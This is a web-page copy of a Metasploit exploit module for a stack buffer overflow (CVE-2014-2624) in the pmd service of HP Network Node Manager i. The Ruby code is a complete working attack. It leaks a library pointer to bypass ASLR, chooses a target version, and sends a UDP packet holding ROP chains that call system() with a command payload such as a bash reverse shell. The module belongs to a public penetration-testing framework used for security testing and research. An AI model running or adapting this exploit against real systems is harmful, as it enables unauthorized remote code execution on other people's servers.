CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/misc/hp_nnmi_pmd_bof.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Udp

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'HP Network Node Manager I PMD Buffer Overflow',

14
      'Description'    => %q{

15
        This module exploits a stack buffer overflow in HP Network Node Manager I (NNMi). The

16
        vulnerability exists in the pmd service, due to the insecure usage of functions like

17
        strcpy and strcat while handling stack_option packets with user controlled data. In

18
        order to bypass ASLR this module uses a proto_tbl packet to leak an libov pointer from

19
        the stack and finally build the ROP chain to avoid NX.

20
      },

21
      'Author'         =>

22
        [

23
          'd(-_-)b',     # Vulnerability discovery

24
          'juan vazquez' # Metasploit module

25
        ],

26
      'References'     =>

27
        [

28
          ['CVE', '2014-2624'],

29
          ['ZDI', '14-305']

30
        ],

31
      'Payload'        =>

32
        {

33
          'BadChars'    => "\x00",

34
          'Space'       => 3000,

35
          'DisableNops' => true,

36
          'Compat'      =>

37
            {

38
              'PayloadType' => 'cmd cmd_bash',

39
              'RequiredCmd' => 'generic python perl openssl bash-tcp gawk'

40
            }

41
        },

42
      'Arch'           => ARCH_CMD,

43
      'Platform'       => 'unix',

44
      'Targets'        =>

45
        [

46
          ['Automatic', {}],

47
          ['HP NNMi 9.10 / CentOS 5',

48
            {

49
              # ptr to .rodata with format specifier

50
              #.rodata:0003BE86 aS_1            db '%s',0

51
              'ov_offset'      => 0x3BE86,

52
              :rop             => :rop_hp_nnmi_9_10

53
            }

54
          ],

55
          ['HP NNMi 9.20 / CentOS 6',

56
            {

57
              # ptr to .rodata with format specifier

58
              #.rodata:0003C2D6 aS_1            db '%s',0

59
              'ov_offset'      => 0x3c2d8,

60
              :rop             => :rop_hp_nnmi_9_20

61
            }

62
          ]

63
        ],

64
      'Privileged'     => false, # true for HP NNMi 9.10, false for HP NNMi 9.20

65
      'DisclosureDate' => '2014-09-09',

66
      'DefaultTarget'  => 0

67
      ))

68


69
    register_options([ Opt::RPORT(7426) ])

70
  end

71


72
  def check

73
    header = [

74
      0x2a5,  # pmdmgr_init pkt

75
      0x3cc,  # signature

76
      0xa0c,  # signature

77
      0xca8   # signature

78
    ].pack("V")

79


80
    data = "\x00" * (0xfa4 - header.length)

81


82
    pkt = header + data

83


84
    connect_udp

85
    udp_sock.put(pkt)

86
    res = udp_sock.timed_read(8, 1)

87
    if res.blank?

88
      # To mitigate MacOSX udp sockets behavior

89
      udp_sock.put(pkt)

90
      res = udp_sock.timed_read(8)

91
    end

92
    disconnect_udp

93


94
    if res.blank?

95
      return Exploit::CheckCode::Unknown

96
    elsif res.length == 8 && res.unpack("V").first == 0x2a5

97
      return Exploit::CheckCode::Detected

98
    else

99
      return Exploit::CheckCode::Unknown

100
    end

101
  end

102


103
  def exploit

104
    connect_udp

105
    # info leak with a "proto_tbl" packet

106
    print_status("Sending a 'proto_tbl' request...")

107
    udp_sock.put(proto_tbl_pkt)

108


109
    res = udp_sock.timed_read(13964, 1)

110
    if res.blank?

111
      # To mitigate MacOSX udp sockets behavior

112
      udp_sock.put(proto_tbl_pkt)

113
      res = udp_sock.timed_read(13964)

114
    end

115


116
    if res.blank?

117
      fail_with(Failure::Unknown, "Unable to get a 'proto_tbl' response...")

118
    end

119


120
    if target.name == 'Automatic'

121
      print_status("Fingerprinting target...")

122
      my_target = auto_target(res)

123
      fail_with(Failure::NoTarget, "Unable to autodetect target...") if my_target.nil?

124
    else

125
      my_target = target

126
      fail_with(Failure::Unknown, "Unable to leak libov base address...") unless find_ov_base(my_target, res)

127
    end

128


129
    print_good("Exploiting #{my_target.name} with libov base address at 0x#{@ov_base.to_s(16)}...")

130


131
    # exploit with a "stack_option_pkt" packet

132
    udp_sock.put(stack_option_pkt(my_target, @ov_base))

133


134
    disconnect_udp

135
  end

136


137
  def rop_hp_nnmi_9_10(ov_base)

138
    rop = rand_text_alpha(775)

139
    rop << [0x808d7c1].pack("V")          # pop ebx ; pop ebp ; ret

140
    rop << [ov_base + 0x481A8].pack("V")  # ebx: libov .got

141
    rop << [0x8096540].pack("V")          # ptr to .data where user controlled string will be stored:

142
                                          # "PMD Stack option specified, but stack not available (user_controlled)"

143
    rop << [0x808d7c2].pack("V")          # pop ebp # ret

144
    rop << [0x08096540 + 4732].pack("V")  # ebp: ptr to our controlled data in .data (+0x1028 to compensate)

145
    rop << [ov_base +  0x1D692].pack("V") # ptr to 'call _system' sequence:

146
                                          #.text:0001D692  lea     eax, [ebp+dest]

147
                                          #.text:0001D698  push    eax             ; command

148
                                          #.text:0001D699  call    _system

149
    rop

150
  end

151


152
  def rop_hp_nnmi_9_20(ov_base)

153
    rop = rand_text_alpha(775)

154
    rop << [0x808dd70].pack("V")                      # pop eax ; pop ebx ; pop ebp ; ret

155
    rop << [0xf7f61cd0 + ov_base + 0x1dae6].pack("V") # eax: ptr to 'call _system' sequence

156
                                                      #.text:0001DAE6  lea     eax, [ebp+dest] (dest = -0x1028)

157
                                                      #.text:0001DAEC  push    eax             ; command

158
                                                      #.text:0001DAED  call    _system

159
    rop << [0x08097160].pack("V")                     # ebx: ptr to .data where user controlled string will be stored:

160
                                                      # "PMD Stack option specified, but stack not available (user_controlled)"

161
    rop << rand_text_alpha(4)                         # ebp: padding

162
    rop << [0x804fb86].pack("V")                      # add eax 0x809e330 ; add ecx ecx ; ret (control eax)

163
    rop << [0x8049ac4].pack("V")                      # xchg eax, edi ; ret

164
    rop << [0x808dd70].pack("V")                      # pop eax ; pop ebx ; pop ebp ; ret

165
    rop << [0xf7f61cd0 + ov_base + 0x47f1c].pack("V") # eax: libov .got base

166
    rop << rand_text_alpha(4)                         # ebx: padding

167
    rop << [0x8097160 + 4764].pack("V")               # ebp: ptr to our controlled data in .data (+0x1028 to compensate)

168
    rop << [0x804fb86].pack("V")                      # add eax 0x809e330 ; add ecx ecx ; ret (control eax)

169
    rop << [0x805a58d].pack("V")                      # xchg ebx eax ; and eax 0xc4830001 ; and cl cl ; ret (ebx: libov .got)

170
    rop << [0x8049ac4].pack("V")                      # xchg eax, edi ; ret ; (eax: call to system sequence from libov)

171
    rop << [0x80528BC].pack("V")                      # jmp eax

172


173
    rop

174
  end

175


176
  def stack_option_pkt(t, ov_base)

177
    hdr = [0x2a9].pack("V")             # stack_option packet

178
    data = "-SA"                        # stack name (invalid one 'A')

179
    data << ";"                         # separator

180
    data << self.send(t[:rop], ov_base) # malformed stack options

181
    data << payload.encoded

182
    data << ";\n"

183
    data << "\x00" * (0xfa4 - data.length - hdr.length)

184


185
    hdr + data

186
  end

187


188
  def proto_tbl_pkt

189
    hdr = [0x2aa].pack("V") # proto_tbl packet

190
    data = "\x00" * (0xfa4 - hdr.length)

191


192
    hdr + data

193
  end

194


195
  def base(address, offset)

196
    address - offset

197
  end

198


199
  def find_ov_base(t, data)

200
    print_status("Searching #{t.name} pointers...")

201
    i = 0

202
    data.unpack("V*").each do |int|

203
      if base(int, t['ov_offset']) % 0x1000 == 0

204
        print_status("Pointer 0x#{int.to_s(16)} found at offset #{i * 4}")

205
        @ov_base = base(int, t['ov_offset'])

206
        return true

207
      end

208
      i = i + 1

209
    end

210


211
    false

212
  end

213


214
  def auto_target(data)

215
    targets.each do |t|

216
      next if t.name == 'Automatic'

217
      if find_ov_base(t, data)

218
        return t

219
      end

220
    end

221


222
    nil

223
  end

224
end

225


226